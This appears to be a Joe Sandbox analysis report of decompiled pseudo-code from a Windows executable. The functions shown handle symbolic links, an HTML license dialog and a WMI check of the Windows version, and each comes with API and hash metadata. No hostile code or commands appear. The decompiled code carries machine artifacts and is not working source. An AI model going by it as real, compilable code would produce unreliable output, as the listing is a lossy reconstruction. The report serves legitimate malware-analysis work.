                                                    											 *(_t253 - 4) = 1;
                                                    											E00CC7A7B(_t253 - 0x30b4, _t239);
                                                    											_t240 =  *((intOrPtr*)(_t253 + 8));
                                                    											_t247 =  *((intOrPtr*)(_t253 + 0x10));
                                                    											asm("sbb ecx, ecx");
                                                    											asm("sbb ecx, ecx");
                                                    											asm("sbb ecx, ecx");
                                                    											E00CC9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
                                                    											E00CC9620(_t253 - 0x30b4);
                                                    											__eflags =  *((char*)(_t240 + 0x71a8));
                                                    											if( *((char*)(_t240 + 0x71a8)) == 0) {
                                                    												E00CCA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
                                                    											}
                                                    											_t201 = 1;
                                                    											E00CC959A(_t253 - 0x30b4);
                                                    											goto L42;
                                                    										}
                                                    										CloseHandle(_t239);
                                                    										E00CC2021(__eflags, 0x15, 0, _t200);
                                                    										_t154 = GetLastError();
                                                    										__eflags = _t154 - 5;
                                                    										if(_t154 == 5) {
                                                    											L33:
                                                    											__eflags = E00CD07BC();
                                                    											if(__eflags == 0) {
                                                    												E00CC15C6(_t253 - 0x7c, 0x18);
                                                    												E00CD15FE(_t253 - 0x7c);
                                                    											}
                                                    											L35:
                                                    											E00CC6DCB(0xd01098, __eflags);
                                                    											E00CC6D83(0xd01098, 9);
                                                    											_t250 =  *((intOrPtr*)(_t253 + 0x10));
                                                    											_push(_t200);
                                                    											__eflags =  *((char*)(_t250 + 0x10f1));
                                                    											if( *((char*)(_t250 + 0x10f1)) == 0) {
                                                    												DeleteFileW();
                                                    											} else {
                                                    												RemoveDirectoryW();
                                                    											}
                                                    											goto L38;
                                                    										}
                                                    										__eflags = _t154 - 0x522;
                                                    										if(__eflags != 0) {
                                                    											goto L35;
                                                    										}
                                                    										goto L33;
                                                    									}
                                                    									E00CC6C23(_t200);
                                                    									E00CC6D83(0xd01098, 9);
                                                    									goto L38;
                                                    								}
                                                    								__eflags = _t117 - 1;
                                                    								if(_t117 != 1) {
                                                    									goto L38;
                                                    								}
                                                    								goto L27;
                                                    							}
                                                    							_t234 =  *(_t253 - 0x2c);
                                                    							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
                                                    							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
                                                    							 *_t234 = 0xa0000003;
                                                    							_t252 = _t229 + _t229;
                                                    							 *((short*)(_t234 + 0xa)) = _t252;
                                                    							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
                                                    							 *((intOrPtr*)(_t234 + 6)) = 0;
                                                    							E00CE6066(_t234 + 0x10, _t253 - 0x107c);
                                                    							_t246 =  *(_t253 - 0x2c);
                                                    							 *((short*)(_t246 + 0xc)) = _t252 + 2;
                                                    							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
                                                    							E00CE6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
                                                    							goto L28;
                                                    						}
                                                    						E00CC6C23(_t200);
                                                    						goto L38;
                                                    					}
                                                    				} else {
                                                    					if( *(_t253 - 0xd) != 0) {
                                                    						L38:
                                                    						_t201 = 0;
                                                    						L42:
                                                    						E00CC15FB(_t253 - 0x2c);
                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
                                                    						return _t201;
                                                    					}
                                                    					_t190 = E00CCBCC3(_t244 + 0x1104);
                                                    					_t269 = _t190;
                                                    					if(_t190 != 0) {
                                                    						goto L38;
                                                    					}
                                                    					_push(_t244 + 0x1104);
                                                    					_push(_t200);
                                                    					_push(_t244 + 0x28);
                                                    					_push(_t237);
                                                    					if(E00CC7861(_t269) == 0) {
                                                    						goto L38;
                                                    					}
                                                    					goto L12;
                                                    				}
                                                    			}


                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                    • _wcslen.LIBCMT ref: 00CC7013
                                                    • _wcslen.LIBCMT ref: 00CC7084
                                                      • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                      • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                      • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3122303884-3508440684
                                                    • Opcode ID: d502f12da381699e073937578270b949921da9f26f00feba7350980356787a81
                                                    • Instruction ID: 5dbcb383ebd6ef09d2ae41895b61a45cb6145fa3213d24bf275f61f230db643d
                                                    • Opcode Fuzzy Hash: d502f12da381699e073937578270b949921da9f26f00feba7350980356787a81
                                                    • Instruction Fuzzy Hash: 674119B1D083887AEB20E770DD46FEE776CDF14344F04055EFA5AA7182D674AB449B21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00CD9711(void* __edx) {
                                                    				void* __ecx;
                                                    				void* _t20;
                                                    				short* _t24;
                                                    				void* _t28;
                                                    				void* _t29;
                                                    				intOrPtr* _t36;
                                                    				void* _t43;
                                                    				void* _t58;
                                                    				intOrPtr* _t60;
                                                    				short* _t62;
                                                    				short* _t64;
                                                    				intOrPtr* _t68;
                                                    				long _t70;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    
                                                    				_t58 = __edx;
                                                    				_t42 = _t43;
                                                    				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
                                                    					return _t20;
                                                    				}
                                                    				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
                                                    				_t60 =  *((intOrPtr*)(_t72 + 0x18));
                                                    				 *((char*)(_t72 + 0x13)) = E00CD95AA(_t60);
                                                    				_push(0x200 + E00CE3E13(_t60) * 2);
                                                    				_t24 = E00CE3E33(_t43);
                                                    				_t64 = _t24;
                                                    				if(_t64 == 0) {
                                                    					L16:
                                                    					return _t24;
                                                    				}
                                                    				E00CE6066(_t64, L"<html>");
                                                    				E00CE7686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                    				E00CE7686(_t64, L"utf-8\"></head>");
                                                    				_t73 = _t72 + 0x18;
                                                    				_t68 = _t60;
                                                    				_t28 = 0x20;
                                                    				if( *_t60 != _t28) {
                                                    					L4:
                                                    					_t29 = E00CD1FDD(_t77, _t68, L"<html>", 6);
                                                    					 *((char*)(_t73 + 0x12)) = _t29 == 0;
                                                    					if(_t29 == 0) {
                                                    						_t60 = _t68 + 0xc;
                                                    					}
                                                    					E00CE7686(_t64, _t60);
                                                    					if( *((char*)(_t73 + 0x1a)) == 0) {
                                                    						E00CE7686(_t64, L"</html>");
                                                    					}
                                                    					_t81 =  *((char*)(_t73 + 0x13));
                                                    					if( *((char*)(_t73 + 0x13)) == 0) {
                                                    						_push(_t64);
                                                    						_t64 = E00CD9955(_t58, _t81);
                                                    					}
                                                    					_t70 = 9 + E00CE3E13(_t64) * 6;
                                                    					_t62 = GlobalAlloc(0x40, _t70);
                                                    					if(_t62 != 0) {
                                                    						_t13 = _t62 + 3; // 0x3
                                                    						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
                                                    							 *_t62 = 0;
                                                    						} else {
                                                    							 *_t62 = 0xbbef;
                                                    							 *((char*)(_t62 + 2)) = 0xbf;
                                                    						}
                                                    					}
                                                    					L00CE3E2E(_t64);
                                                    					_t24 =  *0xd23180(_t62, 1, _t73 + 0x14);
                                                    					if(_t24 >= 0) {
                                                    						E00CD95EB( *((intOrPtr*)(_t42 + 0x10)));
                                                    						_t36 =  *((intOrPtr*)(_t73 + 0x10));
                                                    						 *0xcf3278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
                                                    						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
                                                    					}
                                                    					goto L16;
                                                    				} else {
                                                    					goto L3;
                                                    				}
                                                    				do {
                                                    					L3:
                                                    					_t68 = _t68 + 2;
                                                    					_t77 =  *_t68 - _t28;
                                                    				} while ( *_t68 == _t28);
                                                    				goto L4;
                                                    			}



















                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CD9736
                                                    • _wcslen.LIBCMT ref: 00CD97D6
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00CD97E5
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CD9806
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                    • API String ID: 1116704506-4209811716
                                                    • Opcode ID: 659b05d26be2f65a5ff5df1c6b7015c8808d2271a3c92209889e1af5fda91abe
                                                    • Instruction ID: ad2d56a3adaa5945573440aec76031bdf0ffc490b6dd6441e9136d78f966f700
                                                    • Opcode Fuzzy Hash: 659b05d26be2f65a5ff5df1c6b7015c8808d2271a3c92209889e1af5fda91abe
                                                    • Instruction Fuzzy Hash: CA3135361083817BE725AB21AC46F6FB7ACEF42720F14011FF611972D2EB749A0493A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E00CDB5C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                    				long _t9;
                                                    				long _t10;
                                                    				WCHAR* _t11;
                                                    				void* _t25;
                                                    				signed short _t28;
                                                    				void* _t29;
                                                    				intOrPtr _t30;
                                                    				struct HWND__* _t34;
                                                    				intOrPtr _t35;
                                                    				void* _t36;
                                                    				struct HWND__* _t37;
                                                    
                                                    				_t29 = __ecx;
                                                    				_t28 = _a12;
                                                    				_t35 = _a8;
                                                    				_t34 = _a4;
                                                    				if(E00CC1316(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
                                                    					L16:
                                                    					__eflags = 1;
                                                    					return 1;
                                                    				}
                                                    				_t36 = _t35 - 0x110;
                                                    				if(_t36 == 0) {
                                                    					E00CDD69E(_t29, __edx, __eflags, __fp0, _t34);
                                                    					_t9 =  *0xd17b7c;
                                                    					__eflags = _t9;
                                                    					if(_t9 != 0) {
                                                    						SendMessageW(_t34, 0x80, 1, _t9);
                                                    					}
                                                    					_t10 =  *0xd1ec84;
                                                    					__eflags = _t10;
                                                    					if(_t10 != 0) {
                                                    						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
                                                    					}
                                                    					_t11 =  *0xd1fc9c;
                                                    					__eflags = _t11;
                                                    					if(__eflags != 0) {
                                                    						SetWindowTextW(_t34, _t11);
                                                    					}
                                                    					_t37 = GetDlgItem(_t34, 0x65);
                                                    					SendMessageW(_t37, 0x435, 0, 0x10000);
                                                    					SendMessageW(_t37, 0x443, 0,  *0xd230c4(0xf));
                                                    					 *0xd230c0(_t34);
                                                    					_t30 =  *0xd08444; // 0x0
                                                    					E00CD9ED5(_t30, __eflags,  *0xd0102c, _t37,  *0xd1fc98, 0, 0);
                                                    					L00CE3E2E( *0xd1fc9c);
                                                    					L00CE3E2E( *0xd1fc98);
                                                    					goto L16;
                                                    				}
                                                    				if(_t36 != 1) {
                                                    					L5:
                                                    					return 0;
                                                    				}
                                                    				_t25 = (_t28 & 0x0000ffff) - 1;
                                                    				if(_t25 == 0) {
                                                    					_push(1);
                                                    					L7:
                                                    					EndDialog(_t34, ??);
                                                    					goto L16;
                                                    				}
                                                    				if(_t25 == 1) {
                                                    					_push(0);
                                                    					goto L7;
                                                    				}
                                                    				goto L5;
                                                    			}















                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDB610
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDB637
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CDB650
                                                    • SetWindowTextW.USER32(?,?), ref: 00CDB661
                                                    • GetDlgItem.USER32(?,00000065), ref: 00CDB66A
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CDB67E
                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CDB694
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                    • String ID: LICENSEDLG
                                                    • API String ID: 3214253823-2177901306
                                                    • Opcode ID: ed81faa7e1a083a74ea98954d23888845ad38f00fe7b63e44ca3bb4658e13000
                                                    • Instruction ID: 5bf5ea699c2ba75b74370fe73ffe60e035f3da6c2ab8921c89bdebe47a08b06e
                                                    • Opcode Fuzzy Hash: ed81faa7e1a083a74ea98954d23888845ad38f00fe7b63e44ca3bb4658e13000
                                                    • Instruction Fuzzy Hash: 23219E32604305BBD2259F66ED4AF7B3B6DEB46B81F024016F704D23A0CB56DE03A675
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 45%
                                                    			E00CDFD10(void* __ebx, char* __edx, char* _a4) {
                                                    				int _v8;
                                                    				signed int _v12;
                                                    				char _v20;
                                                    				short* _v28;
                                                    				signed int _v32;
                                                    				short* _v36;
                                                    				int _v40;
                                                    				int _v44;
                                                    				intOrPtr _v60;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t30;
                                                    				signed int _t31;
                                                    				char _t33;
                                                    				int _t34;
                                                    				signed short _t36;
                                                    				signed short _t38;
                                                    				void* _t49;
                                                    				short* _t50;
                                                    				int _t52;
                                                    				int _t53;
                                                    				char* _t58;
                                                    				int _t59;
                                                    				void* _t60;
                                                    				char* _t61;
                                                    				intOrPtr* _t62;
                                                    				intOrPtr* _t63;
                                                    				char* _t69;
                                                    				intOrPtr _t70;
                                                    				int _t71;
                                                    				intOrPtr* _t72;
                                                    				void* _t74;
                                                    				short* _t75;
                                                    				void* _t78;
                                                    				signed int _t79;
                                                    				void* _t81;
                                                    				short* _t82;
                                                    
                                                    				_t69 = __edx;
                                                    				_push(0xfffffffe);
                                                    				_push(0xcfc130);
                                                    				_push(E00CE2900);
                                                    				_push( *[fs:0x0]);
                                                    				_t82 = _t81 - 0x18;
                                                    				_t30 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v12 = _v12 ^ _t30;
                                                    				_t31 = _t30 ^ _t79;
                                                    				_v32 = _t31;
                                                    				_push(__ebx);
                                                    				_push(_t75);
                                                    				_push(_t71);
                                                    				_push(_t31);
                                                    				 *[fs:0x0] =  &_v20;
                                                    				_v28 = _t82;
                                                    				_t58 = _a4;
                                                    				if(_t58 != 0) {
                                                    					_t61 = _t58;
                                                    					_t69 =  &(_t61[1]);
                                                    					do {
                                                    						_t33 =  *_t61;
                                                    						_t61 =  &(_t61[1]);
                                                    					} while (_t33 != 0);
                                                    					_t62 = _t61 - _t69;
                                                    					_t34 = _t62 + 1;
                                                    					_v44 = _t34;
                                                    					if(_t34 > 0x7fffffff) {
                                                    						L17:
                                                    						E00CDFCF0(0x80070057);
                                                    						goto L18;
                                                    					} else {
                                                    						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
                                                    						_v40 = _t71;
                                                    						if(_t71 == 0) {
                                                    							L18:
                                                    							_t36 = GetLastError();
                                                    							if(_t36 > 0) {
                                                    								_t36 = _t36 & 0x0000ffff | 0x80070000;
                                                    							}
                                                    							E00CDFCF0(_t36);
                                                    							goto L21;
                                                    						} else {
                                                    							_v8 = 0;
                                                    							_t49 = _t71 + _t71;
                                                    							if(_t71 >= 0x1000) {
                                                    								_push(_t49);
                                                    								_t50 = E00CE3E33(_t62);
                                                    								_t82 =  &(_t82[2]);
                                                    								_t75 = _t50;
                                                    								_v36 = _t75;
                                                    								_v8 = 0xfffffffe;
                                                    							} else {
                                                    								E00CF2010(_t49);
                                                    								_v28 = _t82;
                                                    								_t75 = _t82;
                                                    								_v36 = _t75;
                                                    								_v8 = 0xfffffffe;
                                                    							}
                                                    							if(_t75 == 0) {
                                                    								L16:
                                                    								E00CDFCF0(0x8007000e);
                                                    								goto L17;
                                                    							} else {
                                                    								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
                                                    								if(_t52 == 0) {
                                                    									L21:
                                                    									if(_t71 >= 0x1000) {
                                                    										L00CE3E2E(_t75);
                                                    										_t82 =  &(_t82[2]);
                                                    									}
                                                    									_t38 = GetLastError();
                                                    									if(_t38 > 0) {
                                                    										_t38 = _t38 & 0x0000ffff | 0x80070000;
                                                    									}
                                                    									E00CDFCF0(_t38);
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									asm("int3");
                                                    									_push(_t79);
                                                    									_t70 = _v60;
                                                    									_push(_t71);
                                                    									_t72 = _t62;
                                                    									 *_t72 = 0xcf56f8;
                                                    									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
                                                    									_t63 =  *((intOrPtr*)(_t70 + 8));
                                                    									 *((intOrPtr*)(_t72 + 8)) = _t63;
                                                    									 *(_t72 + 0xc) = 0;
                                                    									if(_t63 != 0) {
                                                    										 *0xcf3278(_t63, _t75);
                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
                                                    									}
                                                    									return _t72;
                                                    								} else {
                                                    									__imp__#2(_t75);
                                                    									_t59 = _t52;
                                                    									if(_t71 >= 0x1000) {
                                                    										L00CE3E2E(_t75);
                                                    										_t82 =  &(_t82[2]);
                                                    									}
                                                    									if(_t59 == 0) {
                                                    										goto L16;
                                                    									} else {
                                                    										_t53 = _t59;
                                                    										goto L2;
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t53 = 0;
                                                    					L2:
                                                    					 *[fs:0x0] = _v20;
                                                    					_pop(_t74);
                                                    					_pop(_t78);
                                                    					_pop(_t60);
                                                    					return E00CDFBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
                                                    				}
                                                    			}


                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,349E4B74,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFD99
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE14
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CDFE1F
                                                    • _com_issue_error.COMSUPP ref: 00CDFE48
                                                    • _com_issue_error.COMSUPP ref: 00CDFE52
                                                    • GetLastError.KERNEL32(80070057,349E4B74,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE57
                                                    • _com_issue_error.COMSUPP ref: 00CDFE6A
                                                    • GetLastError.KERNEL32(00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE80
                                                    • _com_issue_error.COMSUPP ref: 00CDFE93
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 1353541977-0
                                                    • Opcode ID: f47b0364b21e274300b8395eff8d559f051d035b7f87e71740edf2f9316ad8b4
                                                    • Instruction ID: 16c1c7d2a3311061220dbafdef9f074fb83e4c6c3ac5a5ad70f61f0d79630d8f
                                                    • Opcode Fuzzy Hash: f47b0364b21e274300b8395eff8d559f051d035b7f87e71740edf2f9316ad8b4
                                                    • Instruction Fuzzy Hash: 824138B1A00248ABDB109F65CC45BAEBBA8FF44710F14423FFA16E7351D7349A01C7A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 29%
                                                    			E00CCAF24() {
                                                    				intOrPtr* _t63;
                                                    				intOrPtr* _t64;
                                                    				void* _t66;
                                                    				intOrPtr* _t67;
                                                    				signed char _t70;
                                                    				intOrPtr* _t72;
                                                    				signed char** _t75;
                                                    				signed char** _t76;
                                                    				signed char* _t77;
                                                    				intOrPtr* _t78;
                                                    				void* _t80;
                                                    				signed char _t81;
                                                    				intOrPtr* _t82;
                                                    				intOrPtr* _t85;
                                                    				signed char _t92;
                                                    				signed char _t98;
                                                    				signed char _t105;
                                                    				signed char _t108;
                                                    				signed char* _t118;
                                                    				signed char _t119;
                                                    				signed char _t127;
                                                    				signed char _t139;
                                                    				void* _t147;
                                                    				void* _t149;
                                                    				void* _t155;
                                                    				void* _t162;
                                                    
                                                    				E00CDEB78(0xcf2919, _t162);
                                                    				_push(_t162 - 0x14);
                                                    				_push(0xcf574c);
                                                    				_t105 = 0;
                                                    				_push(1);
                                                    				_push(0);
                                                    				_push(0xcf581c);
                                                    				 *((intOrPtr*)(_t162 - 0x14)) = 0;
                                                    				if( *0xd23188() >= 0) {
                                                    					_push(L"ROOT\\CIMV2");
                                                    					 *((intOrPtr*)(_t162 - 0x10)) = 0;
                                                    					_t63 =  *((intOrPtr*)(E00CCAE2D(_t162 - 0x20)));
                                                    					 *(_t162 - 4) = 0;
                                                    					if(_t63 == 0) {
                                                    						_t108 = 0;
                                                    					} else {
                                                    						_t108 =  *_t63;
                                                    					}
                                                    					_t64 =  *((intOrPtr*)(_t162 - 0x14));
                                                    					 *0xcf3278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
                                                    					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
                                                    					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
                                                    					_t149 = _t66;
                                                    					_t110 =  *(_t162 - 0x20);
                                                    					if( *(_t162 - 0x20) != 0) {
                                                    						E00CCAEF6(_t110);
                                                    					}
                                                    					if(_t149 < 0) {
                                                    						L21:
                                                    						_t67 =  *((intOrPtr*)(_t162 - 0x14));
                                                    						 *0xcf3278(_t67);
                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
                                                    						_t70 = 0;
                                                    					} else {
                                                    						_push(_t105);
                                                    						_push(_t105);
                                                    						_push(3);
                                                    						_push(3);
                                                    						_push(_t105);
                                                    						_push(_t105);
                                                    						_push(0xa);
                                                    						_push( *((intOrPtr*)(_t162 - 0x10)));
                                                    						if( *0xd23184() < 0) {
                                                    							L20:
                                                    							_t72 =  *((intOrPtr*)(_t162 - 0x10));
                                                    							 *0xcf3278(_t72);
                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
                                                    							goto L21;
                                                    						} else {
                                                    							_push("SELECT * FROM Win32_OperatingSystem");
                                                    							 *(_t162 - 0x18) = _t105;
                                                    							_t75 = E00CCADDB(_t162 - 0x28);
                                                    							_push("WQL");
                                                    							 *(_t162 - 4) = 1;
                                                    							_t76 = E00CCADDB(_t162 - 0x20);
                                                    							_t118 =  *_t75;
                                                    							 *(_t162 - 4) = 2;
                                                    							if(_t118 == 0) {
                                                    								_t139 = _t105;
                                                    							} else {
                                                    								_t139 =  *_t118;
                                                    							}
                                                    							_t77 =  *_t76;
                                                    							if(_t77 == 0) {
                                                    								_t119 = _t105;
                                                    							} else {
                                                    								_t119 =  *_t77;
                                                    							}
                                                    							_t78 =  *((intOrPtr*)(_t162 - 0x10));
                                                    							 *0xcf3278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
                                                    							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
                                                    							_t121 =  *(_t162 - 0x20);
                                                    							_t155 = _t80;
                                                    							if( *(_t162 - 0x20) != 0) {
                                                    								E00CCAEF6(_t121);
                                                    								 *(_t162 - 0x20) = _t105;
                                                    							}
                                                    							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
                                                    							_t122 =  *((intOrPtr*)(_t162 - 0x28));
                                                    							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
                                                    								E00CCAEF6(_t122);
                                                    							}
                                                    							if(_t155 >= 0) {
                                                    								_t81 =  *(_t162 - 0x18);
                                                    								 *(_t162 - 0x1c) = _t105;
                                                    								 *(_t162 - 0x24) = _t105;
                                                    								if(_t81 != 0) {
                                                    									while(1) {
                                                    										 *0xcf3278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
                                                    										 *((intOrPtr*)( *_t81 + 0x10))();
                                                    										if( *(_t162 - 0x24) == 0) {
                                                    											goto L26;
                                                    										}
                                                    										_t92 =  *(_t162 - 0x1c);
                                                    										 *0xcf3278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
                                                    										 *((intOrPtr*)( *_t92 + 0x10))();
                                                    										_t105 = _t105 | E00CE23F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
                                                    										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
                                                    										_t98 =  *(_t162 - 0x1c);
                                                    										 *0xcf3278(_t98);
                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
                                                    										_t81 =  *(_t162 - 0x18);
                                                    										if(_t81 != 0) {
                                                    											continue;
                                                    										}
                                                    										goto L26;
                                                    									}
                                                    								}
                                                    								L26:
                                                    								_t82 =  *((intOrPtr*)(_t162 - 0x10));
                                                    								 *0xcf3278(_t82);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
                                                    								_t85 =  *((intOrPtr*)(_t162 - 0x14));
                                                    								 *0xcf3278(_t85);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
                                                    								_t127 =  *(_t162 - 0x18);
                                                    								 *0xcf3278(_t127);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
                                                    								_t70 = _t105;
